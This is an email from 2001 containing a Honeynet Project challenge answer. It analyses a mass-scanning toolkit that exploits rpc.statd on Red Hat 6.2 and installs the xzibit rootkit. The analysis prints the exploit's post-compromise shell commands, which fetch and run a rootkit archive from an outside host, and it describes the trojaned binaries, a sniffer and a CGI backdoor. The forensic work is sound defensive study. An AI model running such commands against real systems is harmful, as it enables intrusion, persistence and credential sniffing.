From jace@deakin.edu.au Sat Mar 17 20:02:13 2001 Date: Fri, 9 Mar 2001 13:44:53 +1100 From: Jason Lee To: project@honeynet.org Subject: Scan of the Month - March - Scan13 Hi, First of all, I'd like to tell you how much I've enjoyed learning from project honeynet. It's excellent. Keep up the good work! I did some analysis on Scan13 and have attached my findings. This is my first attempt at analyzing a compromise. Probably interesting for you to compare the findings of a novice (me) with seasoned pros. Jason Lee 7 March 2001 ### Question 1. What is the blackhat attempting to do with his command line syntax? They retrieve LUCKROOT.TAR from www.becys.org via lynx and untar it. Next they are running the luckgo shell script on various class A and C networks. I'm not sure why they have tried the "200 120" and "216 1" networks twice?? Human error? ### Question 2. What does the tool accomplish? Obtains (if possible) root access on any host running redhat 6.2 inside the network supplied by the user, installs a rootkit, cleans up and exits. ### Question 3. How does the tool work? The luckgo script takes between 1 and 3 arguments, which correspond to the left three octets in a network address. eg: ./luckgo 1 2 3 would correspond to the 1.2.3.0 network. ./luckgo 1 would correspond to the 1.0.0.0 network. The luckgo script then checks to see if the binaries luckscan-a and luckstatdx exist. If they don't, they are compiled from luckscan-a.c and luckstatdx.c respectively. Next, if the file scan.log exists, it is removed. It then runs luckscan-a with the arguments supplied, plus another argument, which is the port number to check. The port number (111) is supplied as the second argument to luckscan-a. luckscan-a attempts to connect to port 111 (portmapper) on every host in the network supplied by the user. If a successful connection is made, it runs luckstatdx on that host, and continues searching the rest of the hosts in the network. This is the sort of command that is used in the system() call to run luckstatdx. luckstatdx -d 0 The '-d 0' option 'brutely' specifies a Redhat 6.2 system, even though it might not be. luckstatdx then tries to exploit rpc.statd on the remote host to gain root. If it succeeds at gaining root access, it runs these commands via /bin/sh: cd / uname -a id wget -nd http://www.becys.org/xzibit.tar.gz tar -zxvf xzibit.tar.gz cd lamerk ./install cd / rm -rf lamerk xzibit.tar.gz xzibit.tar.gz consists of: tar -ztvf xzibit.tar.gz drwxr-xr-x 1000/1000 0 2001-02-17 23:03:00 lamerk/ -rwxr-xr-x 1000/1000 19840 1983-09-26 10:45:00 lamerk/ifconfig -rwx------ 1000/1000 7165 1983-09-26 10:45:00 lamerk/linsniffer -rwx------ 1000/1000 75 1983-09-26 10:45:00 lamerk/logclear -rwxr-xr-x 1000/1000 35300 1983-09-26 10:45:00 lamerk/netstat -rwxr-xr-x 1000/1000 33280 1983-09-26 10:45:00 lamerk/ps -rwxr-xr-x 1000/1000 4060 1983-09-26 10:45:00 lamerk/sense -rwx------ 1000/1000 8268 1983-09-26 10:45:00 lamerk/sl2 -rwxr-xr-x 1000/1000 53588 1983-09-26 10:45:00 lamerk/top -rw-r--r-- 1000/1000 704 2001-02-19 13:04:41 lamerk/s -rwx------ 1000/1000 1916 2001-02-17 23:02:53 lamerk/install -rwxr-xr-x 1000/1000 686535 2000-12-03 07:43:43 lamerk/sshdu -rw------- 1000/1000 541 1983-09-26 10:45:00 lamerk/ssh_host_key -rw------- 1000/1000 512 1983-09-26 10:45:00 lamerk/ssh_random_seed -rwxr-xr-x 1000/1000 76 2000-11-12 09:01:58 lamerk/hdparm -rwxr-xr-x 1000/1000 4620 2000-08-09 12:06:10 lamerk/becys.cgi and type of files: file * becys.cgi: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped hdparm: Bourne shell script text ifconfig: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped install: Bourne shell script text linsniffer: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped logclear: ASCII text netstat: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped ps: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped s: ASCII text sense: perl commands text sl2: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped sshdu: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped ssh_host_key: data ssh_random_seed: data top: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped Details of these files: becys.cgi* ========== CGI binary that allows commands to be executed under the user that httpd is running as. hdparm* ======= Shell script that runs sshdu and linsniffer. sshdu* ssh_host_key ssh_random_seed =============== SSH Server s = ssh server systemwide configuration file. ifconfig* netstat* ps* top* ========= Trojaned versions. install* ======== Shell script to install rootkit and create config files for trojaned binaries. linsniffer* =========== Network sniffer logclear* ========= Shell script that stops linsniffer, removes tcp.log, touches tcp.log and restarts linsniffer. sense* ====== Perl script that sorts the output from LinSniffer sl2* ==== Not sure other than a few strings out of the binary: Unknown host %s sendto Usage: %s srcaddr dstaddr low high If srcaddr is 0, random addresses will be used socket %i.%i.%i.%i High port must be greater than Low port. ### Question 4. Is this tool a worm, or would you classify it as something else? I wouldn't call it a worm, because it doesn't self propagate. I'd call it an automated scripting type of tool. The tool sets out to hack a swag of hosts en masse and report the results back to becys@becys.org. ### Question 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? Not sure about 'luckgo' and 'luckscan-a', but 'luckstatdx' is the exact source code from 'statdx' (http://www.securityfocus.com/data/vulnerabilities/exploits/statdx.c) used to exploit rpc.statd on Redhat 6.x, albeit for a few modifications. Firstly, three printf's have been modified. Two are uninteresting, but the other one mentions 'becys|ReSpEkT scan-h4x0r'. printf("You now have a new server rooted with rpc.statd technique and becys|ReSpEkT scan-h4x0r !\n"); The original statdx code only mentions that 'You now have rpc.statd technique', whereas this version also mentions 'scan-h4x0r'. I think this printf reflects that this tool has also installed it's rootkit. The other modification is the commands passed to /bin/sh when the shell code is executed. The commands are detailed above in the answer to question 3. All the C comments detailing the attack in statdx have been removed from the top of the file. ### Bonus Question: What information can you obtain about who is using or created the tool? becys is using the tool. Maybe too obvious, but becys wrote luckgo, made mods in luckstatdx and the tool downloads files from http://www.becys.org/. After analyzing the files in xzibit.tar.gz, it's becys or someone from becys.org who's using the tool. After all, in the install script, the results of the hacked host are sent to becys@becys.org. ...Unless someone is framing becys.org luckgo ------ Looks like it was written by becys (becys@becys.org http://www.becys.org) maybe with some help from ReSpEkT. luckscan-a ---------- I don't think luckscan-a.c was written by becys & ReSpEkT, due to the inconsistency of the style of dialogue in printf's. luckstatdx ---------- statdx was written by ron1n , which luckstatdx was modified from. There is a comment in luckstatdx.c that references becys making a mod: // Becys was modify herre some cmd.